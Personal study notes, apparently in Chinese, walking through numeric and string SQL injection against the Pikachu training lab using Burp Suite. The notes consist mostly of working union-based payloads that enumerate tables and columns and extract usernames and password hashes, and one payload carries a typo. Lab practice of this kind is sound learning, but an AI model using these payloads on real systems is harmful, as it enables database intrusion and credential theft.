yeah!
注意:不要访问localhost
使用局域网ip访问
环回地址和localhost在burp是默认不抓包的
数字型注入POST
1. GET更容易受到攻击
前端下拉菜单选择 限制输入
2. 抓包修改id值
1 and 1 = 1 返回正常
1 and 1 = 2 查询失败
3. 爆字段
1 order by 2
1 order by 3
……
4. 爆库 爆用户
1 union select user(),database()
5. 爆表
1 union select database(), group_concat(table_name) from information_schema.tables where table_schema=database()
6. 爆列
1 union select database(), group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'
‘user’ 会一直报错,或许有大佬可以告我问什么吗
去掉 and table_name=‘users’
7. 爆值
1 union select database(),group_concat(username,,password) from pikachu.users
admine10adc3949ba59abbe56e057f20f883e,pikachu670b14728ad9902aecba32e22fa4f6bd,teste99a18c428cb38d5f260853678922e03
字符型注入GET
url编码问题卡了我很久
SELECT * FROM users WHERE username='$username';
一样的流程
闭合引号
fancy' and 1=1 --+
kobe' order by 2 --+
kobe' union select user(),database()--+
kobe' union select database(
),group_concat(table_name) from information_schema.tables where table_schema='pikachu' --+
kobe' union select database(),group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users' --+
kobe' union select database(),group_concat(username,'~',password) from pikachu.users--+